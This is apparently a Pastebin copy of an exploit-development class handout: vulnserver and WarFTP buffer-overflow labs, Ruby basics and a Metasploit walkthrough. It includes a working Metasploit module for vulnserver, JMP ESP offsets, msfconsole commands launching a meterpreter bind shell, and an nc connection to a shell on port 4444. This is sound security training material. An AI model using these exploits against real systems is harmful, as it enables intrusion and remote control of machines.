Advertisement
joemccray

Exploit Dev - SN - 2019

Mar 4th, 2019
619
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 57.12 KB | None | 0 0
  1. #####################################
  2. # Quick Stack Based Buffer Overflow #
  3. #####################################
  4.  
  5. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
  6. http://45.63.104.73/ExploitLab.zip
  7. http://45.63.104.73/nc-password-is-netcat.zip
  8. http://45.63.104.73/WarFTP.zip
  9. http://45.63.104.73/SEH.zip
  10. http://45.63.104.73/sws.zip
  11. http://45.63.104.73/tftpd.zip
  12.  
  13.  
  14. - Extract the ExploitLab.zip file to your Desktop
  15.  
  16. - Go to folder C:\Users\student\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  17.  
  18. - Open a new command prompt and type:
  19.  
  20. ---------------------------Type This-----------------------------------
  21.  
  22. nc localhost 9999
  23. --------------------------------------------------------------------------
  24.  
  25. - In the new command prompt window where you ran nc type:
  26. HELP
  27.  
  28. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
  29. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  30.  
  31. - Now double-click on 1-simplefuzzer.py
  32. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  33.  
  34.  
  35. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  36.  
  37. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  38.  
  39. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  40.  
  41. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  42.  
  43. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  44.  
  45. - Calculate the distance to EIP by running script 3-3000chars.py
  46. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  47.  
  48. 4-count-chars-to-EIP.py
  49. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
  50. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  51.  
  52. 5-2006char-eip-check.py
  53. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
  54.  
  55. 6-jmp-esp.py
  56. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
  57.  
  58. 7-first-exploit
  59. - In this script we actually do the stack overflow and launch a bind shell on port 4444
  60.  
  61. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
  62.  
  63.  
  64. ------------------------------
  65.  
  66.  
  67.  
  68. #########################################
  69. # FreeFloat FTP Server Exploit Analysis #
  70. #########################################
  71.  
  72.  
  73.  
  74. Analyze the following exploit code:
  75. https://www.exploit-db.com/exploits/15689/
  76.  
  77. 1. What is the target platform that this exploit works against?
  78. 2. What is the variable name for the distance to EIP?
  79. 3. What is the actual distance to EIP in bytes?
  80. 4. Describe what is happening in the variable ‘junk2’
  81.  
  82.  
  83.  
  84.  
  85. Analysis of the training walk-through based on EID: 15689:
  86. http://45.63.104.73/ff.zip
  87.  
  88.  
  89.  
  90.  
  91. ff1.py
  92. 1. What does the sys module do? Call System Commands
  93. 2. What is sys.argv[1] and sys.argv[2]?
  94. 3. What application entry point is being attacked in this script?
  95.  
  96.  
  97.  
  98. ff2.py
  99. 1. Explain what is happening in lines 18 - 20 doing.
  100. 2. What pattern_create.rb doing and where can I find it?
  101. 3. Why can’t I just double click the file to run this script?
  102.  
  103.  
  104.  
  105. ff3.py
  106. 1. Explain what is happening in lines 17 - to 25?
  107. 2. Explain what is happening in lines 30 - to 32?
  108. 3. Why is everything below line 35 commented out?
  109.  
  110.  
  111.  
  112. ff4.py
  113. 1. Explain what is happening in lines 13 - to 15.
  114. 2. Explain what is happening in line 19.
  115. 3. What is the total length of buff?
  116.  
  117.  
  118.  
  119. Ff5.py
  120. 1. Explain what is happening in line 15.
  121. 2. What is struct.pack?
  122. 3. How big is the shellcode in this script?
  123.  
  124.  
  125.  
  126. ff6.py
  127. 1. What is the distance to EIP?
  128. 2. How big is the shellcode in this script?
  129. 3. What is the total byte length of the data being sent to this app?
  130.  
  131.  
  132.  
  133.  
  134. ff7.py
  135. 1. What is a tuple in python?
  136. 2. How big is the shellcode in this script?
  137. 3. Did your app crash in from this script?
  138.  
  139.  
  140.  
  141.  
  142. ff8.py
  143. 1. How big is the shellcode in this script?
  144. 2. What is try/except in python?
  145. 3. What is socket.SOCK_STREAM in Python?
  146.  
  147.  
  148.  
  149. ff9.py
  150. 1. What is going on in lines 19 and 20?
  151. 2. What is the length of the NOPs?
  152. 3. What is socket.SOCK_STREAM in Python?
  153.  
  154.  
  155.  
  156.  
  157. ff010.py
  158. 1. What is going on in lines 18 - 20?
  159. 2. What is going on in lines 29 - 32?
  160. 3. How would a stack adjustment help this script?
  161.  
  162.  
  163. Required review videos to watch tonight:
  164. ----------------------------------------
  165. https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
  166. Please watch videos 1-5 tonight. Vivek has a deep accent so I understand that it may be difficult but his material is very good - probably the best on the internet today.
  167.  
  168. Recommended (not required) videos to watch tonight:
  169. ---------------------------------------------------
  170. For more background on Assembly I would recommend the following video series (videos 1-11):
  171. https://www.youtube.com/playlist?list=PL6brsSrstzga43kcZRn6nbSi_GeXoZQhR
  172. Again, you DO NOT have to watch these tonight but if you are really interested in the subject of exploit development I think they will be very helpful.
  173.  
  174.  
  175.  
  176. ---------------------------------------------------------------------------------------------------------------------############################
  177. # Day 2: Ruby Fundamentals #
  178. ############################
  179.  
  180.  
  181.  
  182. - Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer
  183. scientist and programmer from Japan. It is a cross-platform dynamic language.
  184.  
  185. - The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby
  186. on Rails is a framework that is written in Ruby.
  187.  
  188. - Ruby's file name extensions are .rb and .rbw.
  189.  
  190. - official website of this
  191.  
  192. - language: www.ruby-lang.org.
  193.  
  194.  
  195. - interactive Shell called Ruby Shell
  196.  
  197. - open up the interactive console and play around.
  198.  
  199. ---------------------------Type This-----------------------------------
  200. irb
  201. -----------------------------------------------------------------------
  202.  
  203.  
  204. - Math, Variables, Classes, Creating Objects and Inheritance
  205.  
  206.  
  207. The following arithmetic operators:
  208. Addition operator (+) — 10 + 23
  209. Subtraction operator (-) — 1001 - 34
  210. Multiplication operator (*) — 5 * 5
  211. Division operator (/) — 12 / 2
  212.  
  213.  
  214.  
  215. - Now let's cover some variable techniques. In Ruby, you can assign a value to a variable using the assignment
  216. operator. '=' is the assignment operator. In the following example, 25 is assigned to x. Then x is incremented by
  217. 30. Again, 69 is assigned to y, and then y is incremented by 33.
  218.  
  219. ---------------------------Type This-----------------------------------
  220. x = 25
  221. x + 30
  222. y = 69
  223. y+33
  224. -----------------------------------------------------------------------
  225.  
  226.  
  227.  
  228. - Let's look at creating classes and creating objects.
  229.  
  230. - Here, the name of the class is Attack. An object has its properties and methods.
  231.  
  232.  
  233. ---------------------------Type This-----------------------------------
  234. class Attack
  235. attr_accessor :of, :sqli, :xss
  236. end
  237. -----------------------------------------------------------------------
  238.  
  239.  
  240. What is nil?
  241. Reference:
  242. https://www.codecademy.com/en/forum_questions/52a112378c1cccb0f6001638
  243.  
  244. nil is the Ruby object that represents nothingness. Whenever a method doesn’t return a useful value, it returns nil. puts and print are methods that return nil:
  245.  
  246. Since the Ruby Console always shows the value of the last statement or expression in your code, if that last statement is print, you’ll see the nil.
  247.  
  248. To prevent the nil from "sticking" to the output of print (which doesn’t insert a line break), you can print a line break after it, and optionally put some other value as the last statement of your code, then the Console will show it instead of nil:
  249.  
  250.  
  251.  
  252.  
  253.  
  254. # Now that we have created the classes let's create the objects
  255. ---------------------------Type This-----------------------------------
  256. first_attack = Attack.new
  257. first_attack.of = "stack"
  258. first_attack.sqli = "blind"
  259. first_attack.xss = "dom"
  260. puts first_attack.of
  261. puts first_attack.sqli
  262. puts first_attack.xss
  263. -----------------------------------------------------------------------
  264.  
  265.  
  266.  
  267.  
  268. - Let's work on some inheritance that will help make your programming life easier. When we have multiple classes,
  269. inheritance becomes useful. In simple words, inheritance is the classification of classes. It is a process by which
  270. one object can access the properties/attributes of another object of a different class. Inheritance makes your
  271. programming life easier by maximizing code reuse.
  272.  
  273.  
  274. ---------------------------Type This-----------------------------------
  275. class Exploitframeworks
  276. attr_accessor :scanners, :exploits, :shellcode, :postmodules
  277. end
  278. class Metasploit < Exploitframeworks
  279. end
  280. class Canvas < Exploitframeworks
  281. end
  282. class Coreimpact < Exploitframeworks
  283. end
  284. class Saint < Exploitframeworks
  285. end
  286. class Exploitpack < Exploitframeworks
  287. end
  288. -----------------------------------------------------------------------
  289.  
  290.  
  291.  
  292.  
  293. - Methods, More Objects, Arguments, String Functions and Expression Shortcuts
  294.  
  295. - Let's create a simple method. A method is used to perform an action and is generally called with an object.
  296.  
  297. - Here, the name of the method is 'learning'. This method is defined inside the Msfnl class. When it is called,
  298. it will print this string: "We are Learning how to PenTest"
  299.  
  300. - An object named 'bo' is created, which is used to call the method.
  301.  
  302.  
  303. ---------------------------Type This-----------------------------------
  304. class Msfnl
  305. def learning
  306. puts "We are Learning how to PenTest"
  307. end
  308. end
  309. -----------------------------------------------------------------------
  310.  
  311. #Now let's define an object for our Method
  312.  
  313. ---------------------------Type This-----------------------------------
  314. joe = Msfnl.new
  315. joe.learning
  316. -----------------------------------------------------------------------
  317.  
  318.  
  319.  
  320. - An argument is a value or variable that is passed to the function while calling it. In the following example, while
  321. calling the puts() function, we are sending a string value to the function. This string value is used by the
  322. function to perform some particular operations.
  323.  
  324. puts ("Pentesting")
  325.  
  326.  
  327. - There are many useful string functions in Ruby. String functions make it easy to work with strings. Now, we will
  328. explain some useful string functions with an example.
  329.  
  330. - The length function calculates the length of a string. The upcase function converts a string to uppercase. And the
  331. reverse function reverses a string. The following example demonstrates how to use the string functions.
  332.  
  333. ---------------------------Type This-----------------------------------
  334. 55.class
  335. "I Love Programming".class
  336. "I Love Pentesting".length
  337. "Pown that box".upcase
  338. "Love" + "To Root Boxes"
  339. "evil".reverse
  340. "evil".reverse.upcase
  341. -----------------------------------------------------------------------
  342.  
  343.  
  344. - expressions and shortcuts. In the below example, 'a' is an operand, '3' is an operand, '=' is
  345. an operator, and 'a=3' is the expression. A statement consists of one or multiple expressions. Following are the
  346. examples of some expressions.
  347.  
  348. ---------------------------Type This-----------------------------------
  349. a = 3
  350. b = 6
  351. a+b+20
  352. d = 44
  353. f = d
  354. puts f
  355. -----------------------------------------------------------------------
  356.  
  357.  
  358.  
  359.  
  360.  
  361. - shortcuts. +=, *= are the shortcuts. These operators are also called abbreviated
  362. assignment operators. Use the shortcuts to get the effect of two statements in just one. Consider the following
  363. statements to understand the shortcuts.
  364.  
  365. ---------------------------Type This-----------------------------------
  366. g = 70
  367. g = g+44
  368. g += 33
  369. -----------------------------------------------------------------------
  370.  
  371.  
  372. - In the above statement, g is incremented by 33 and then the total value is assigned to g.
  373.  
  374.  
  375.  
  376. ---------------------------Type This-----------------------------------
  377. g *= 3
  378. -----------------------------------------------------------------------
  379.  
  380.  
  381. - In the above statement, g is multiplied with 3 and then assigned to g.
  382.  
  383. - Example
  384.  
  385. - Comparison Operators, Loops, Data Types, and Constants
  386.  
  387. - Comparison operators are used for comparing one variable or constant with another variable or constant. We will show
  388. how to use the following comparison operators.
  389.  
  390. 'Less than' operator (<): This operator is used to check whether a variable or constant is less than another
  391. variable or constant. If it's less than the other, the 'less than' operator returns true.
  392.  
  393. 'Equal to' operator (==): This operator is used to check whether a variable or constant is equal to another variable
  394. or constant. If it's equal to the other, the 'equal to' operator returns true.
  395.  
  396. 'Not equal to' operator (!=): This operator is used to check whether a variable or constant is not equal to another
  397. variable or constant. If it's not equal to the other, the 'not equal to' operator returns true.
  398.  
  399. ---------------------------Type This-----------------------------------
  400. numberofports = 55
  401. puts "number of ports found during scan" if numberofports < 300
  402. numberofports = 400
  403. puts "number of ports found during scan" if numberofports < 300
  404. puts "number of ports found during scan" if numberofports == 300
  405. puts "number of ports found during scan" if numberofports != 300
  406. -----------------------------------------------------------------------
  407.  
  408.  
  409.  
  410. Example
  411.  
  412.  
  413. - the 'OR' operator and the 'unless' keyword. This symbol '||' represents the logical 'OR' operator.
  414.  
  415. - This operator is generally used to combine multiple conditions.
  416. - In case of two conditions, if both or any of the conditions is true, the 'OR'operator returns true. Consider the
  417.  
  418. - following example to understand how this operator works.
  419.  
  420. ---------------------------Type This-----------------------------------
  421. ports = 100
  422. puts "number of ports found on the network" if ports<100 || ports>200
  423. puts "number of ports found on the network" if ports<100 || ports>75
  424. -----------------------------------------------------------------------
  425.  
  426. # unless
  427.  
  428. ---------------------------Type This-----------------------------------
  429. portsbelow1024 = 50
  430. puts "If the ports are below 1024" unless portsbelow1024 < 1000
  431. puts "If the ports are below 1024" unless portsbelow1024 < 1055
  432. puts "If the ports are below 1024" unless portsbelow1024 < 20
  433. -----------------------------------------------------------------------
  434.  
  435. - The 'unless' keyword is used to do something programmatically unless a condition is true.
  436.  
  437.  
  438.  
  439. - Loops are used to execute statement(s) repeatedly. Suppose you want to print a string 10 times.
  440.  
  441. - See the following example to understand how a string is printed 10 times on the screen using a loop.
  442.  
  443. ---------------------------Type This-----------------------------------
  444. 10.times do puts "infosecaddicts" end
  445. -----------------------------------------------------------------------
  446.  
  447. # Or use the curly braces
  448.  
  449. ---------------------------Type This-----------------------------------
  450. 10.times {puts "infosecaddicts"}
  451. -----------------------------------------------------------------------
  452.  
  453.  
  454. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  455. working with different data types. Data type conversion is also known as type casting.
  456.  
  457.  
  458.  
  459. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  460. change the value of a constant, you will see a warning message.
  461.  
  462.  
  463.  
  464.  
  465. - Multiple Line String Variable, Interpolation, and Regular Expressions
  466.  
  467. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  468.  
  469. ---------------------------Type This-----------------------------------
  470. infosecaddicts = <<mark
  471. welcome
  472. to the
  473. best
  474. metasploit
  475. course
  476. on the
  477. market
  478. mark
  479. puts infosecaddicts
  480. -----------------------------------------------------------------------
  481.  
  482.  
  483. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  484. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  485. Examine the following example to understand how interpolation works in Ruby.
  486.  
  487. References:
  488. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  489.  
  490.  
  491. ---------------------------Type This-----------------------------------
  492. a = 4
  493. b = 6
  494. puts "a * b = a*b"
  495. puts " #{a} * #{b} = #{a*b} "
  496. person = "Joe McCray"
  497. puts "IT Security consultant person"
  498. puts "IT Security consultant #{person}"
  499. -----------------------------------------------------------------------
  500.  
  501. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  502.  
  503.  
  504.  
  505.  
  506.  
  507. - Character classes
  508. ---------------------------Type This-----------------------------------
  509. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  510. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  511. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  512. -----------------------------------------------------------------------
  513.  
  514.  
  515. - Arrays, Push and Pop, and Hashes
  516.  
  517.  
  518. - In the following example, numbers is an array that holds 6 integer numbers.
  519.  
  520.  
  521. ---------------------------Type This-----------------------------------
  522. numbers = [2,4,6,8,10,100]
  523. puts numbers[0]
  524. puts numbers[4]
  525. numbers[2] = 150
  526. puts numbers
  527. -----------------------------------------------------------------------
  528.  
  529.  
  530.  
  531. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  532.  
  533.  
  534. ---------------------------Type This-----------------------------------
  535. framework = []
  536. framework << "modules"
  537. framework << "exploits"
  538. framework << "payloads"
  539. framework.pop
  540. framework.shift
  541. -----------------------------------------------------------------------
  542.  
  543. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  544. that is used to access the element.
  545.  
  546.  
  547. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  548. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  549. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  550.  
  551. ---------------------------Type This-----------------------------------
  552. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  553. print metasploit.size
  554. print metasploit["microsoft"]
  555. metasploit['microsoft'] = 'redhat'
  556. print metasploit['microsoft']
  557. -----------------------------------------------------------------------
  558.  
  559.  
  560.  
  561. - Writing Ruby Scripts
  562.  
  563.  
  564. - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  565. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  566. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  567. ---------------------------Type This-----------------------------------
  568. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  569. ls
  570. -----------------------------------------------------------------------
  571.  
  572.  
  573.  
  574. ###########################
  575. # Metasploit Fundamentals #
  576. ###########################
  577.  
  578. - Let's take a little look at Metasploit Framework
  579.  
  580. - First, we should take note of the different directories, the Modular Architecture.
  581.  
  582. The modules that make up the Modular Architecture are
  583. Exploits
  584. Auxiliary
  585. Payload
  586. Encoder
  587. Nops
  588.  
  589.  
  590. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  591.  
  592. are
  593.  
  594. Modules
  595. Scripts
  596. Plugins
  597. External
  598. Data
  599. Tools
  600.  
  601. - Let's take a look inside the Metasploit directory and see what's the
  602. ---------------------------Type This-----------------------------------
  603. cd ~/toolz/metasploit
  604. ls
  605. -----------------------------------------------------------------------
  606.  
  607.  
  608.  
  609. - Now let's take a look inside the Modules directory and see what's there.
  610. ---------------------------Type This-----------------------------------
  611. cd ~/toolz/metasploit/modules
  612. ls
  613. -----------------------------------------------------------------------
  614.  
  615.  
  616. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  617. not necessarily need to - have a shell or session started on a machine.
  618.  
  619. The exploits directory has our modules that we need to pop a shell on a box.
  620. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  621. like Burp Suite
  622. - Let's take a look at the external directory
  623. ---------------------------Type This-----------------------------------
  624. cd ~/toolz/metasploit/external
  625. ls
  626. -----------------------------------------------------------------------
  627.  
  628. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  629. ---------------------------Type This-----------------------------------
  630. cd ~/toolz/metasploit/data
  631. ls
  632. -----------------------------------------------------------------------
  633.  
  634. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  635. brute-forcing
  636. ---------------------------Type This-----------------------------------
  637. cd ~/toolz/metasploit/data/wordlists
  638. ls
  639. -----------------------------------------------------------------------
  640.  
  641. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  642. once a session is created.
  643. ---------------------------Type This-----------------------------------
  644. cd ~/toolz/metasploit/data/meterpreter
  645. ls
  646. -----------------------------------------------------------------------
  647.  
  648. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  649. like escalating privileges and dumping hashes.
  650.  
  651. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  652. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  653. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  654. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  655. custom shellcode.
  656.  
  657. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  658. to do with other programs to make things like importing and exporting reports simple.
  659. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  660. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  661. modules we're going to have a better understanding of where everything needs to go.
  662. ---------------------------Type This-----------------------------------
  663. cd ~/toolz/metasploit/modules/exploits
  664. ls
  665. -----------------------------------------------------------------------
  666.  
  667.  
  668. - The exploits directory is split up into several different directories, each one housing exploits for different types
  669. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  670. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  671. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  672. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  673. for us.
  674. ---------------------------Type This-----------------------------------
  675. cd ~/toolz/metasploit/modules/auxiliary/
  676. ls
  677. -----------------------------------------------------------------------
  678.  
  679.  
  680. - And a little further into the directory, let's take a look at what's in the scanner directory
  681. ---------------------------Type This-----------------------------------
  682. cd ~/toolz/metasploit/modules/auxiliary/scanner/
  683. ls
  684. -----------------------------------------------------------------------
  685.  
  686.  
  687. - And one more folder deeper into the structure, let's take a look in the portscan folder
  688. ---------------------------Type This-----------------------------------
  689. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  690. ls
  691. -----------------------------------------------------------------------
  692.  
  693. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  694. and report them back to us in a nice, easily readable format.
  695.  
  696. cat tcp.rb
  697.  
  698.  
  699.  
  700. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  701. once you have a session on a machine.
  702. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  703. succeeds.
  704. ---------------------------Type This-----------------------------------
  705. cd ~/toolz/metasploit/modules/payloads/
  706. ls
  707. -----------------------------------------------------------------------
  708.  
  709.  
  710. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  711. application for it to be used as.
  712. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  713. do everything once you have that shell calling back to you.
  714. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  715. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  716. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  717. to download Stages payloads.
  718.  
  719.  
  720. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  721. shells.
  722. ---------------------------Type This-----------------------------------
  723. cd singles
  724. cd windows
  725. ls
  726. -----------------------------------------------------------------------
  727.  
  728.  
  729. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  730. see what it actually does.
  731. ---------------------------Type This-----------------------------------
  732. cat adduser.rb
  733. -----------------------------------------------------------------------
  734.  
  735. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  736. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  737. it gives Windows to add the user to the system.
  738.  
  739.  
  740. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  741.  
  742. windows/shell/bind_tcp or windows/shell/reverse_tcp
  743. ---------------------------Type This-----------------------------------
  744. cd ../../stagers
  745. ls
  746. -----------------------------------------------------------------------
  747.  
  748.  
  749.  
  750. - Again, we can see that we have stagers for multiple systems and code types.
  751. ---------------------------Type This-----------------------------------
  752. ls windows/
  753. -----------------------------------------------------------------------
  754.  
  755.  
  756. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  757. machine, so we can upload or download our stage payloads and execute commands.
  758. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  759. our stagers...
  760. ---------------------------Type This-----------------------------------
  761. cd ../stages
  762. ls
  763. -----------------------------------------------------------------------
  764.  
  765.  
  766. Again, we can see that our stages are coded for particular operating systems and languages.
  767. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  768. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  769. if any.
  770.  
  771. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  772. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  773. so we can impersonate other users on the system in hopes of elevating our privileges.
  774. ---------------------------Type This-----------------------------------
  775. cd ../../../post/
  776. ls
  777. cd windows/
  778. ls
  779. -----------------------------------------------------------------------
  780.  
  781.  
  782. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  783. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  784. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  785. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  786. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  787.  
  788. ------------------------------
  789.  
  790.  
  791.  
  792.  
  793. ------------------------------------------
  794.  
  795. ------------------------------------------
  796.  
  797.  
  798.  
  799.  
  800.  
  801.  
  802. ---------------------------Type This-----------------------------------
  803.  
  804. cd ~/toolz/metasploit/modules/exploits/windows/misc
  805.  
  806. nano vulnserv.rb
  807. -------(paste the code below into this file)-------
  808. #
  809. #
  810. # Quick Metasploit exploit for vulnserver.exe
  811. # Written by: Joe McCray
  812. # Email: joe@strategicsec.com
  813. #
  814. # Place this exploit in:
  815. # ~/toolz/metasploit/modules/exploits/windows/misc
  816. #
  817. require 'msf/core'
  818.  
  819. class Metasploit3 < Msf::Exploit::Remote
  820. include Msf::Exploit::Remote::Tcp
  821. def initialize(info = {})
  822. super(update_info(info,
  823. 'Name' => 'Custom vulnerable server stack overflow',
  824. 'Description' => %q{
  825. This module exploits a stack overflow in an app called
  826. vulnserver that is designed to teach simple exploitation.
  827. },
  828. 'Author' => [ 'Joe McCray' ],
  829. 'DefaultOptions' =>
  830. {
  831. 'EXITFUNC' => 'process',
  832. },
  833. 'Payload' =>
  834. {
  835. 'Space' => 800,
  836. 'BadChars' => "\x00\x20",
  837. },
  838. 'Platform' => 'win',
  839.  
  840. 'Targets' =>
  841. [
  842. [
  843. 'Windows XP SP3 EN',
  844. {
  845. 'Ret' => 0x625011AF,
  846. }
  847. ],
  848. ],
  849. 'DefaultTarget' => 0,
  850.  
  851. 'Privileged' => false
  852. ))
  853.  
  854. register_options(
  855. [
  856. Opt::RPORT(9999)
  857. ], self.class)
  858. end
  859.  
  860. def exploit
  861. connect
  862. sock.recv(1024)
  863.  
  864. p = "\x41" * 16
  865. p << payload.encoded
  866.  
  867. hdr = "TRUN ."
  868. boom = pattern_create(3000)
  869. boom[2006, 4] = [target.ret].pack('V') # EIP value
  870. boom[2010, p.length] = p
  871.  
  872. sploit = hdr + boom
  873.  
  874. sock.put(sploit)
  875.  
  876. handler
  877. disconnect
  878.  
  879. end
  880.  
  881. end
  882. ------------------end of copy/paste content --------------
  883.  
  884.  
  885.  
  886. ---------------------------Type This-----------------------------------
  887. cd ~/toolz/metasploit
  888.  
  889. ./msfconsole
  890.  
  891.  
  892.  
  893. use exploit/windows/misc/vulnserv
  894. set PAYLOAD windows/meterpreter/bind_tcp
  895. set RHOST CHANGEME-TO-YOUR-WIN7-IP
  896. set RPORT 9999
  897. exploit
  898. -----------------------------------------------------------------------
  899. ###########################
  900. # Lab 1a: Stack Overflows #
  901. ###########################
  902.  
  903. #################################
  904. # Start WarFTPd #
  905. # Start WinDBG #
  906. # Press F6 #
  907. # Attach to war-ftpd.exe #
  908. #################################
  909.  
  910. ---------------------------Type This-----------------------------------
  911. c:\python27\python.exe warftpd1.py XPSP3-ED-Target-IP
  912. -----------------------------------------------------------------------
  913.  
  914. At WINDBG prompt
  915. “r” to show registers or “alt+4”
  916.  
  917. ---------------------------Type This-----------------------------------
  918. 0:003> dd eip
  919. 0:003> dd esp
  920. -----------------------------------------------------------------------
  921.  
  922. ---------------------------Type This-----------------------------------
  923.  
  924. c:\python27\python.exe warftpd2.py XPSP3-ED-Target-IP
  925. -----------------------------------------------------------------------
  926.  
  927.  
  928. At WINDBG prompt
  929. “r” to show registers or “alt+4”
  930.  
  931. ---------------------------Type This-----------------------------------
  932.  
  933. 0:003> dd eip
  934. 0:003> dd esp
  935. -----------------------------------------------------------------------
  936.  
  937. Eip: 32714131
  938. esp: affd58 (71413471)
  939.  
  940. Now we need to SSH into the StrategicSec Ubuntu host
  941.  
  942. ---------------------------Type This-----------------------------------
  943.  
  944. cd /home/strategicsec/toolz/metasploit/tools
  945.  
  946. ruby pattern_offset.rb 32714131
  947. 485
  948.  
  949. ruby pattern_offset.rb 71413471
  950. 493
  951. -----------------------------------------------------------------------
  952.  
  953. Distance to EIP is: 485
  954. Relative position of ESP is: 493
  955.  
  956. RET – POP EIP
  957. RET 4 – POP EIP and shift ESP down by 4 bytes
  958.  
  959. ---------------------------Type This-----------------------------------
  960.  
  961. cd /home/strategicsec/toolz/metasploit/
  962. ./msfpescan -j ESP DLLs/xpsp3/shell32.dll
  963. -----------------------------------------------------------------------
  964.  
  965. 0x7c9c167d push esp; retn 0x304d
  966. 0x7c9d30d7 jmp esp < - how about we use this one
  967. 0x7c9d30eb jmp esp
  968. 0x7c9d30ff jmp esp
  969.  
  970.  
  971. warftpd3.py with Notepad++
  972. Fill in the appropriate values
  973. Distance to EIP
  974. Address of JMP ESP
  975.  
  976.  
  977. ---------------------------Type This-----------------------------------
  978.  
  979. c:\python27\python.exe warftpd3.py XPSP3-ED-Target-IP
  980.  
  981. 0:003> dd eip
  982. 0:003> dd esp
  983. -----------------------------------------------------------------------
  984.  
  985.  
  986.  
  987.  
  988.  
  989. Mention bad characters
  990. No debugger
  991.  
  992.  
  993. ---------------------------Type This-----------------------------------
  994.  
  995. c:\python27\python.exe warftpd4.py XPSP3-ED-Target-IP
  996.  
  997. nc XPSP3-ED-Target-IP 4444
